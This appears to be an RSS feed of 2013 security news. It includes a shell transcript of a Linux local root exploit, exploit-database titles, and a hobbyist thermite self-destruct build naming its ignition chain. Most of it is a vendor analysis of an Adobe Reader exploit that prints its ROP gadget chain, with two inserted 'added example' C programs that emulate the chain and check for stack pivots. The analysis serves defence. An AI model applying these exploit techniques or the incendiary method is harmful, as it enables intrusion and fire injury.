Shared posts

24 May 11:11

There are several variants of the signed Mac trojan

by Csizmazia István [Rambo]

Yesterday we reported on the trojan carrying a genuine, valid Apple Developer ID that spied on victims' OS X machines. A good number of antivirus products already detect it, but according to reports several versions of it are spreading.

[...] Read more!

24 May 07:28

Curiosity Rewarded: Florida Teen Heading to Space Camp, Not Jail

by timothy
Kiera Wilmot, the Florida high school student who was expelled from her school after an unauthorized science experiment was misperceived as a weapon (at least for purposes of arrest and charging), won't be going to jail. She will, though, be going to Space Camp, thanks to a crowdfunding campaign started by author and former NASA engineer Homer Hickham. All charges against her have been dropped.

Read more of this story at Slashdot.



24 May 07:27

Laptop vs Thermite: Slow motion destruction

by Caleb Kraft

Years ago we covered using thermite to destroy a hard drive. The idea is that if you melt through the platters, the data is completely unrecoverable.  There are tons of videos of people doing this, but they all have a similar format. There’s a hard drive, with a flower pot or soda can sitting on top full of thermite. They then light this with a strip of magnesium and a torch.

I wanted to do something a little different. I wanted to implement thermite as a self destruct mechanism inside the device. To do this, I had to come up with a way to ignite the thermite. This stuff is very difficult to light. You have to get it really really hot. The easiest way is to use magnesium, which itself isn’t the easiest thing to light.

What I finally landed on was an ignition system that uses model rocket igniters, gun powder, and magnesium to light the thermite.  The model rocket igniter can be set off from the 12v line inside your computer. However, it isn’t hot enough to light magnesium shavings, much less thermite. To get it to work, I needed to add some gunpowder. A small amount of gun powder would get hot enough to light the magnesium shavings, which in turn were hot enough to light the thermite. I had to be careful though, because too much gunpowder would cause a rapid expansion, blowing the thermite everywhere instead of lighting it. You can actually see some red thermite being blown out of the external hard drive and the laptop as the gunpowder ignites.

[Images: gun powder; model rocket igniters; magnesium shavings]

Effectiveness of external hard drive self destruction:

I wasn’t sure about this one. There isn’t a whole lot of space for thermite and the ignition system inside the box. On top of that, the only space was at the side of the hard drive, where the walls are the thickest. I had no idea if the small amount of thermite I used would penetrate the drive. It did, just barely as you can see in these pictures. It looks as if it pooled in the screw holes  and made it inside. The platters are damaged.

[Images: burnt unit; looking down on hard drive; you can see a hole in the drive from this angle; yuck; yep, appears to be the screw hole; platters are damaged, but not as effective as thermite to the top]

Effectiveness of laptop destruction:

I decided to completely replace the cd rom with thermite. This gave me a ton of space to put things. I was pretty positive this would work. The hard drive is in the center of this laptop, which meant I had to place it on its side for this to be effective. You can see the thermite work its way down toward the drive in the video. As you can see in the pictures below, the drive cover is completely gone and the platters are destroyed. Success!

[Images: crusty; hard drive is center of the image; platters are clearly visible; completely fried; uncovered; no data coming off that]

Since this system can be powered by batteries or the internal power of your computer, it can be put inside a working device only to be used when needed. Obviously it is a ridiculous fire hazard that no one should bother with. It was a fun experiment though and I really feel like it is something that would fit in well in the world of [James Bond].


Filed under: chemistry hacks, computer hacks, Featured

23 May 12:11

The Pirate Bay film is being blocked in England

A court has ordered internet service providers to block access to several sites.
21 May 16:42

[dos] - win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase

21 May 16:38

Video of the Linux kernel vulnerability being exploited on Ubuntu and Red Hat Enterprise Linux

by Hunger

Brad Spengler, developer of the GRSecurity Linux kernel hardening patch, has now pounced on the quietly fixed critical Linux vulnerability, for which an exploit has existed for three years, and ported the original exploit code to his own Linux kernel exploit framework, called Enlightenment.

The new version obtains root privileges on Ubuntu 12.04 systems and disables every LSM-based protection, from AppArmor to SELinux. The video can be watched here:

http://www.youtube.com/watch?v=llqxbMgIztk&hd=1

The PERF_EVENTS security bug behind the problem originally affected only kernels from 2.6.37 up to 3.8.10, but Red Hat successfully backported the vulnerability to the 2.6.32 version used in Enterprise Linux 6, so those systems are attackable too. Video of it here:

http://www.youtube.com/watch?v=WI0FXZUsLuI&hd=1

21 May 16:38

New OS X malware signed with a certificate belonging to a valid Apple Dev. ID has surfaced

by trey

The Oslo Freedom Forum is an annual event that examines ways to protest and act against authoritarianism and that promotes free and open ideas. This year's conference, held from 13 to 15 May, included a workshop organized for free-speech activists. The workshop was about how these activists try to protect the devices they use against government surveillance, wiretapping and monitoring. During the workshop, Jacob Appelbaum discovered a previously unknown piece of OS X spyware on the machine of one of the Angolan participants; what makes it interesting is that it was signed with a certificate belonging to a valid Apple Developer ID. Since the malware was properly signed, Gatekeeper did not warn the users.

Details on the F-Secure blog.

21 May 16:30

[papers] - GAME ENGINES: A 0-DAY’S TALE

17 May 11:12

ownCloud fixes critical security vulnerabilities

The ownCloud developers have released versions 5.0.6, 4.0.15, and 4.5.11 to fix a number of serious vulnerabilities in their software, including SQL injection, code execution and privilege escalation problems.

15 May 07:37

Another quietly fixed Linux kernel vulnerability...

by Hunger

...for which an exploit is already out, from someone who has known about it for 3 years.

hunger@hgc ~ $ uname -a
Linux hgc 3.2.43 #1 SMP Sat Apr 27 04:00:32 CEST 2013 x86_64 GNU/Linux
hunger@hgc ~ $ id
uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
hunger@hgc ~ $ ./a.out
2.6.37-3.x x86_64
2010
hgc ~ # id
uid=0(root) gid=0(root) groups=0(root),1000(hunger)
hgc ~ #

PaX UDEREF/KERNEXEC protects against it.

https://news.ycombinator.com/item?id=5703758

15 May 06:11

H Security - "Careful with Skype. Microsoft reads everything you write."

by trey

H Security claims that Microsoft reads the messages sent over Skype. The site was tipped off by a reader who said he had noticed unusual network traffic after a Skype IM chat. Shortly after he sent an HTTPS URL over the IM service, the URL was visited from an IP address at Microsoft's Redmond headquarters. H Security set out to test this. It sent two HTTPS URLs: one contained login information, the other pointed to a private cloud-based file-sharing service. The result? A few hours later both HTTPS URLs had been visited from an IP registered to Microsoft in Redmond.

According to H Security, Microsoft used both the login information and the special URL created for the private cloud-based file-sharing service.

H Security confronted Skype... The details can be read here.

14 May 14:30

[remote] - SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution

14 May 14:30

[local] - Linux Kernel open-time Capability file_ns_capable() Privilege Escalation

14 May 14:30

[remote] - SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution

14 May 14:30

[local] - Linux PERF_EVENTS - Local Root Exploit

13 May 07:02

The worst pirates are the best customers

Surprising results from a British survey on illegal downloading. The honest buyer is bad business.
11 May 13:08

There is something new under the sun: fake eBay live chat

by Csizmazia István [Rambo]

According to a recent report, unknown parties have appeared in eBay's name, apparently offering the already familiar official chat window, over HTTPS, with a valid certificate.

[...] Read more!

08 May 07:27

Gauss: Between Technology And Politics

07 May 11:17

The first 3d printed gun has been fired, and I don’t care.

by Caleb Kraft

Several people have sent us this story. I’ve seen it everywhere. A lot of people are upset, on several sides. A gun has been 3d printed that can actually fire a round.

First, we have people scared that this will bring undetectable guns to people who wouldn’t have had access before. Then we have the gun fans that are reacting to the others with shouts of freedom and liberty and stuff.  The 3d printing community has had mixed reactions, but many are concerned that this will harm 3d printing in general.

I simply don’t care.

It isn’t that I’m apathetic to people who are victims of gun violence. It isn’t that I’m apathetic about “gun rights”. I just think that this specific event makes no difference at all.  It is intriguing in the aspect that it is yet another “First!” for the 3d printer community, but beyond that I don’t care, keep the “firsts” coming.

Here are the different points that I have heard brought up.

1. Accessibility: People are concerned that guns will now end up in the hands of people who couldn’t have gotten them before.

I really don’t think this is a legitimate concern. You’ll note the machine that printed that gun. It wasn’t your average reprap. It cost as much as a small house. If you can afford that printer? You could afford a gun. Let’s just pretend your average reprap could print that gun though. Again, you’re going to have to either buy or build one. At this point, you would have been capable of just buying a gun or… building one.

I guess you could go use a friend’s printer to print your gun, but would that really be any more common than taking another person’s gun?

2. Printing restrictions and Legislation: 3d printer fans are scared that laws will be made that will stop them from printing things.

Do you own a lathe? A mill? You know you can make BETTER guns with those? That’s how the gun companies make them! It’s like you have a gun factory in your home! Actually, now that I think of it, they’re using .22 rimfire which can be fired in a pipe with a cap and a nail! How are hardware stores not illegal?

Listen, if they tell me I can’t print gun shaped things, I’ll probably print one just for spite. They aren’t going to enforce such a silly law, it would be impossible.  They can’t even build anything into the system like scanners that can’t scan money. Guns are too diverse and can be made from basic geometry.

3. Anti-Gun legislation: This may be used to push laws that limit firearms in some way.

Anti-gun legislation has so much gun violence to use as a foundation that a slight change in manufacturing really is a drop in the bucket. This won’t change their ability to restrict things. At least, I don’t think it will.

4. A legitimate concern: Detectability.

The only real issue I see here is that a 3d printed gun wouldn’t be detectable by metal detectors. Bullets are though, aren’t they?

These are my opinions on the 3d printed gun. I’m not delving into gun control in general. Since these are opinions, they will most likely be ill-informed and incomplete. Feel free to participate in a civil discussion on the topic.

If you’re curious about whether I personally have a gun, I do not. I think I’m too clumsy to own a firearm. I am fairly sure I’d accidentally shoot someone when I did something stupid. Don’t get me wrong, I do dangerous things. Stupid, dangerous things.


Filed under: 3d Printer hacks, rants, weapons hacks

07 May 08:17

Emerging ‘Stack Pivoting’ Exploits Bypass Common Security

by Peter Szor

[This blog was primarily written by Xiaoning Li of Intel Labs, with assistance from Peter Szor of McAfee Labs.]

In February 2013, the Adobe Product Security Incident Response Team (PSIRT) released security advisory APSA13-02. In that report they listed two vulnerabilities (CVE-2013-0640 and CVE-2013-0641) that were widely exploited. At Intel Labs and McAfee Labs we ran some further analysis of these exploits and want to share some of the interesting details we discovered.

Based on information from the PSIRT, both vulnerabilities will impact all versions of Adobe Reader from 9.x to 11.x. (Some Acrobat versions are also vulnerable.) We verified this claim and found the sample affected all of them.

[Figure: Szor ROP1]

Attack Path

The exploit is spread by a malicious PDF file. When Reader opens the PDF file, it will trigger the vulnerability and start the exploit. This PDF file delivers a very complex attack, bypassing the current Adobe sandbox mechanism to launch the malware.

This flow shows the basic steps for the attack path:

[Figure: Szor ROP2]

The files D.T and L2P.T are DLLs in a sandboxed temp path, as in the following:

[Figure: Szor ROP3]

A new PDF is created in the normal temp path:

[Figure: Szor ROP4]

The new PDF, Visaform Turkey, will appear to hide the exploitation. The exploit uses a lot of memory in the background.

[Figure: Szor ROP5]

First Exploit

The PDF’s first exploit uses a heap overflow to overwrite a virtual function pointer, and also uses a memory information leak to bypass the address space layout randomization (ASLR) protection in Windows. Return-oriented programming is used to bypass data execution prevention (DEP).

Let’s sidetrack for a moment and look at two definitions: Return-oriented programming (ROP) is an exploit technique in which an attacker controls the call stack to indirectly execute arbitrary intended or unintended code to deliver an attack, thereby bypassing security features such as DEP. Stack pivoting is a common technique used by ROP-based exploits. Pointing the stack pointer to an attacker-owned buffer, such as the heap, will provide more flexibility for the attacker to carry out a complex ROP exploit.

Here’s how the exploit works from the first trigger point. The vulnerability is in AcroForm.api. After the exploit prepares customized stack data on the heap, the data triggers the exploit via following instructions in AcroForm.api.

[Figure: Szor ROP6]

With a modified virtual function pointer, the instruction calls into a special ROP gadget, which will start pivoting.

The address for the first gadget is 0x209b9f50. Here’s the original code:

[Figure: Szor ROP7]

But if we decode from 0x209b9f50, the code piece looks like what follows. This is the ROP gadget for stack pivoting:

[Figure: Szor ROP8]

Now the stack points to a fake stack in the heap. The code log in a debugger at runtime looks like this:

[Figure: Szor ROP9]

Once the customized stack works, it will start more ROP gadgets. When the next Ret instruction is called, the stack looks like this:

[Figure: Szor ROP10]

What’s the instruction at 0x6acc1049? It is offset 0x1049 from AcroForm.api because 0x6acc00 is the base address for the target module. Here is the unintended ROP gadget again:

[Figure: Szor ROP11]

The decoded ROP gadget is just a Ret instruction:

[Figure: Szor ROP12]

It will repeat from stack 0x11849a34 to stack 0x1184beb4, a whopping 9,344 (0x2480) times!

Let’s see what the stack content is now:

[Figure: Szor ROP13]

The next gadget will move the esp register to esi. It will control the stack itself.

[Figure: Szor ROP14]

The gadget still includes lots of return addresses with repeated patterns, such as these:

[Figure: Szor ROP15]

With related code pieces:

[Figure: Szor ROP16]

[Figure: Szor ROP17]

[Figure: Szor ROP18]

So the logic will write target memory with values in the ecx register. The same pattern will repeat many times to modify 0x6b55e001, which is the beginning of the data section of AcroForm.api.

[Figure: Szor ROP19]

The data from 0x6b55e001 to 0x6b55e04e is modified and writes several API/DLL names into the area of 0x6b55e001:

  • GetTempPathA
  • fwrite
  • wb
  • CryptStringToBinaryA
  • ntdll
  • RtlDecompressBuffer
  • wcsstr

These strings are later used as parameters during ROP-based API calls. After writing these strings into the data section, the ROP code continues with the following gadgets:

[Figure: Szor ROP20]

We can walk through the first piece of the ROP chain gadget by gadget. The following code moves [esp] to ecx:

                                              6b218551
1184c074  cccc0240 6b022c74 6b19567b 6ad6ed72
1184c084  6b19567b 6b237664

6b218551 58        pop     eax
6b218552 c3        ret

6b022c74 0fb7c0    movzx   eax,ax
6b022c77 c3        ret

6b19567b 97        xchg    eax,edi
6b19567c c3        ret

6ad6ed72 01f7      add     edi,esi
6ad6ed74 c3        ret

6b19567b 97        xchg    eax,edi
6b19567c c3        ret

6b237664 91        xchg    eax,ecx
6b237665 c3        ret

The following code moves the pointer to eax, and then writes [eax] with the previous value in ecx:

                                     6b218551 cccc023c
1184c094  6b022c74 6b19567b 6ad6ed72 6b1d943b
1184c0a4  6b16d51a

6b218551 58        pop     eax
6b218552 c3        ret

6b022c74 0fb7c0    movzx   eax,ax
6b022c77 c3        ret

6b19567b 97        xchg    eax,edi
6b19567c c3        ret

6ad6ed72 01f7      add     edi,esi
6ad6ed74 c3        ret

6b1d943b 57        push    edi
6b1d943c 58        pop     eax
6b1d943d c3        ret

6b16d51a 8908      mov     dword ptr [eax],ecx
6b16d51c c3        ret
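To make the two sequences above concrete, here is an added example (not code from the McAfee/Intel post) in C: a tiny emulator for exactly the seven gadgets listed, driven by the dwords as they appear on the fake stack from 0x1184c070 upward. Two values are assumptions: the fake-stack base esi = 0x1184beb8 is inferred from the text's later statement that the sequence with operand cccc022c targets 0x1184c0e4 (0x1184c0e4 - 0x22c = 0x1184beb8), and the other registers are taken to start at zero. The modelled region size is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the fake stack on the heap that the pivoted esp points
   into.  BASE is inferred from the page: the text says the sequence with operand
   cccc022c targets 0x1184c0e4, and 0x1184c0e4 - 0x22c = 0x1184beb8.  Register
   values other than esi/esp are assumed to start at zero. */
#define BASE         0x1184beb8u
#define REGION_WORDS 256u                 /* 1 KiB of modelled fake stack */

struct cpu { uint32_t eax, ecx, edi, esi, esp; };

static uint32_t region[REGION_WORDS];     /* dword-addressed view of the region */

/* Translate a guest address to a slot in the region, or NULL if out of range. */
static uint32_t *slot(uint32_t addr) {
    if (addr < BASE || addr >= BASE + REGION_WORDS * 4u || (addr & 3u)) return NULL;
    return &region[(addr - BASE) / 4u];
}

uint32_t read_word(uint32_t addr) {
    uint32_t *p = slot(addr);
    return p ? *p : 0;
}

/* ret / pop: take the dword at esp and advance.  Fails if esp left the region. */
static int pop32(struct cpu *c, uint32_t *out) {
    uint32_t *p = slot(c->esp);
    if (!p) return 0;
    *out = *p;
    c->esp += 4;
    return 1;
}

/* Semantics of the gadgets at the addresses listed on the page.  Every gadget
   ends in ret, which the driver loop models by popping the next address. */
static int step(struct cpu *c, uint32_t gadget) {
    uint32_t t, *p;
    switch (gadget) {
    case 0x6b218551u: return pop32(c, &c->eax);                        /* pop eax */
    case 0x6b022c74u: c->eax &= 0xffffu; return 1;                     /* movzx eax,ax */
    case 0x6b19567bu: t = c->eax; c->eax = c->edi; c->edi = t; return 1; /* xchg eax,edi */
    case 0x6ad6ed72u: c->edi += c->esi; return 1;                      /* add edi,esi */
    case 0x6b237664u: t = c->eax; c->eax = c->ecx; c->ecx = t; return 1; /* xchg eax,ecx */
    case 0x6b1d943bu: c->eax = c->edi; return 1;                       /* push edi ; pop eax */
    case 0x6b16d51au:                                                  /* mov [eax],ecx */
        p = slot(c->eax);
        if (!p) return 0;                 /* write outside the modelled region */
        *p = c->ecx;
        return 1;
    default: return 0;                    /* not one of the listed gadgets */
    }
}

/* Run the chain from esp until esp reaches `end`.  Returns the number of
   gadgets executed, or -1 if the chain did something the model cannot follow. */
int run_chain(struct cpu *c, uint32_t end) {
    int n = 0;
    uint32_t gadget;
    while (c->esp < end) {
        if (!pop32(c, &gadget) || !step(c, gadget)) return -1;
        n++;
    }
    return n;
}

/* The two gadget sequences from the page as laid out on the fake stack from
   0x1184c070: the first leaves esi+0x240 in ecx, the second stores that
   pointer at esi+0x23c through eax. */
int emulate_write_sequence(struct cpu *out) {
    static const uint32_t chain[] = {
        0x6b218551u, 0xcccc0240u, 0x6b022c74u, 0x6b19567bu, 0x6ad6ed72u,
        0x6b19567bu, 0x6b237664u,
        0x6b218551u, 0xcccc023cu, 0x6b022c74u, 0x6b19567bu, 0x6ad6ed72u,
        0x6b1d943bu, 0x6b16d51au,
    };
    const uint32_t start = 0x1184c070u;
    struct cpu c = { 0, 0, 0, BASE, start };   /* eax, ecx, edi, esi, esp */
    int rc;

    memset(region, 0, sizeof region);
    memcpy(slot(start), chain, sizeof chain);
    rc = run_chain(&c, start + (uint32_t)sizeof chain);
    *out = c;
    return rc;
}

int main(void) {
    struct cpu c;
    int n = emulate_write_sequence(&c);
    printf("gadgets run: %d\n", n);
    printf("ecx = %08x  (esi + 0x240)\n", (unsigned)c.ecx);
    printf("[%08x] = %08x\n", 0x1184c0f4u, (unsigned)read_word(0x1184c0f4u));
    return 0;
}
```

Run as is, it shows why the exploit needs `movzx eax,ax`: the chain stores only 16-bit offsets (0x0240, 0x023c) on the fake stack and adds esi, the pivoted stack base, at run time, so the same chain works wherever the heap buffer lands. Stepping a real sample in a debugger gives the same register trace; the emulator just removes the need for a live Reader process to follow it.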

The following code gets the LoadLibraryA() API pointer from the import table:

1184c0a4                                    6b218551 6b32b234 6b1d92ac

6b218551 58        pop     eax
6b218552 c3        ret

6b1d92ac ff10      call    dword ptr [eax]
6b1d92ae c3        ret

At this point, the stack keeps the parameter for LoadLibraryA(). This is actually a string for MSVCR100.dll in the “idata” section.

Once the MSVCR100.dll handle is available via LoadLibraryA(), the following code writes the handle to the target address in the heap (actually the fake stack), which is used to call GetProcAddress() as the first parameter. The address is 0x1184c0e4.

1184c0b4                   6b237664 6b218551 cccc022c
1184c0c4  6b022c74 6b19567b 6ad6ed72 6b1d943b
1184c0d4  6b16d51a

6b237664 91        xchg    eax,ecx
6b237665 c3        ret

6b218551 58        pop     eax
6b218552 c3        ret

6b022c74 0fb7c0    movzx   eax,ax
6b022c77 c3        ret

6b19567b 97        xchg    eax,edi
6b19567c c3        ret

6ad6ed72 01f7      add     edi,esi
6ad6ed74 c3        ret

6b1d943b 57        push    edi
6b1d943c 58        pop     eax
6b1d943d c3        ret

6b16d51a 8908      mov     dword ptr [eax],ecx
6b16d51c c3        ret

Next the process calls the following gadgets to get the function pointer for wcsstr via GetProcAddress(). The first parameter is the DLL handle obtained by the previous gadgets.

1184c0d4                    6b218551 6b32b1ec 6b1d92ac

6b218551 58        pop     eax
6b218552 c3        ret

6b1d92ac ff10      call    dword ptr [eax]
6b1d92ae c3        ret

Now it’s time to call the function with the jmp eax gadget.

1184c0e4                     6acce598

6acce598 ffe0      jmp     eax {MSVCR100!wcsstr (6c5f20f1)}

Here the code searches for the string “MODULE” from the heap or the fake stack. There is a long string in the heap following the “MODULE” signature. This is the encoded and compressed DLL D.T. With more gadgets, the code calls CryptStringToBinaryA() to convert this string to binary, and then calls RtlDecompressBuffer() to decompress the binary to the real D.T binary code in memory.

Similar ROP gadgets get ntdll.dll and related API addresses, for example, RtlDecompressBuffer() and CryptStringToBinaryA(). Finally, the ROP gadget calls GetTempPathA() to get the current temp path, the sandboxed path. It will create D.T under this path and call LoadLibraryA() to run the D.T. module.

D.T creates two threads. One shows error messages. The second creates and loads the DLL L2P.T, which exploits the second vulnerability to load L2P.T into a nonsandboxed acrord32 process. Finally this process terminates.

[Figure: Szor ROP21]

Second Exploit

The second exploit triggers the vulnerability at acrord32.exe:

[Figure: Szor ROP22]

Due to a heap overflow, the eax register calls to the stack-pivoting ROP gadget.

[Figure: Szor ROP23]

A few more ROP gadgets after stack pivoting load L2P.T in the same process. L2P.T creates another DLL, langbar.dll, which downloads the rest of the malware.

No Shell

After we reviewed all of the exploit code and corresponding ROP, we found that this exploit does not use any traditional shellcode. All API calls use the fake stack from the stack pivoting.

Mitigation

Stack pivoting is a very common technique to allow an exploit to run powerful gadgets with a fake stack. For this kind of complex case, it’s very hard to create a customized stack within the real stack instead of within a fake stack. Once an exploit can do stack pivoting, it can bypass different defense mechanisms. Evolving security solutions need to address this attack pattern. Stack pivoting creates a very complex ROP attack and is a good example of how exploitation techniques continue to evolve. This successful exploit bypasses both Adobe client security features and basic Windows DEP and ASLR defenses.
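The defensive counterpart to the pattern described above is the check that stack-pivot mitigations (EMET's StackPivot rule is the well-known one) perform on entry to sensitive APIs: if the stack pointer is not inside the calling thread's stack, the call is refused. Here is an added example in C (not code from the McAfee/Intel post) of that check. Assumptions: the bounds lookup parses /proc/self/maps, which is Linux-specific and covers only the main thread (a real guard on Windows reads StackBase/StackLimit from the TEB instead); the bounds and stack pointers in main() are constructed, except 0x11849a34, which is the fake-stack address quoted above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Pure check: is the stack pointer inside the thread's stack [lo, hi)?
   A pivoted esp that points at a heap buffer fails this test. */
int sp_in_bounds(uintptr_t sp, uintptr_t lo, uintptr_t hi) {
    return lo <= sp && sp < hi;
}

/* Linux-only helper (assumption: /proc is mounted): read the main thread's
   stack mapping from /proc/self/maps.  Returns 1 on success, 0 otherwise.
   Only the main thread is labelled "[stack]"; a production guard would take
   the bounds from the thread block (on Windows, the TEB's StackBase/StackLimit). */
int main_thread_stack_bounds(uintptr_t *lo, uintptr_t *hi) {
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    if (!f) return 0;
    while (fgets(line, sizeof line, f)) {
        unsigned long a, b;
        if (strstr(line, "[stack]") && sscanf(line, "%lx-%lx", &a, &b) == 2) {
            fclose(f);
            *lo = (uintptr_t)a;
            *hi = (uintptr_t)b;
            return 1;
        }
    }
    fclose(f);
    return 0;
}

/* What a guard placed in front of a sensitive API does: take the current
   stack pointer, fetch the thread's stack bounds, and refuse the call when
   the pointer lies outside them.
   Returns 1 = stack pointer is sane, 0 = pivot suspected, -1 = bounds unavailable. */
int check_current_sp(void) {
    volatile char marker = 0;              /* lives on the real stack */
    uintptr_t sp = (uintptr_t)&marker;
    uintptr_t lo, hi;
    if (!main_thread_stack_bounds(&lo, &hi)) return -1;
    return sp_in_bounds(sp, lo, hi) ? 1 : 0;
}

int main(void) {
    /* Constructed 32-bit scenario: a 64 KiB thread stack, one stack pointer
       inside it, and the fake-stack address 0x11849a34 quoted on the page. */
    uintptr_t lo = 0x0012f000u, hi = 0x0013f000u;
    printf("sp=0x0013e800 inside thread stack: %d\n", sp_in_bounds(0x0013e800u, lo, hi));
    printf("sp=0x11849a34 inside thread stack: %d\n", sp_in_bounds(0x11849a34u, lo, hi));
    printf("live check on this process: %d\n", check_current_sp());
    return 0;
}
```

The check is cheap, which is why it can sit in front of every call that loads a library or changes memory protections, and it catches exactly the "fake stack" design above, where every API call is made with esp inside a heap buffer. Its limit is also visible in the page's own chain: an exploit that pivots back to the real stack just before each call, or that targets a thread whose bounds the guard does not know, passes it, so it is one layer alongside ASLR, DEP and the sandbox rather than a replacement for them.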

We thank our colleagues Haifei Li, Bing Sun, Xiaobo Chen, and Chong Xu for their help with this analysis.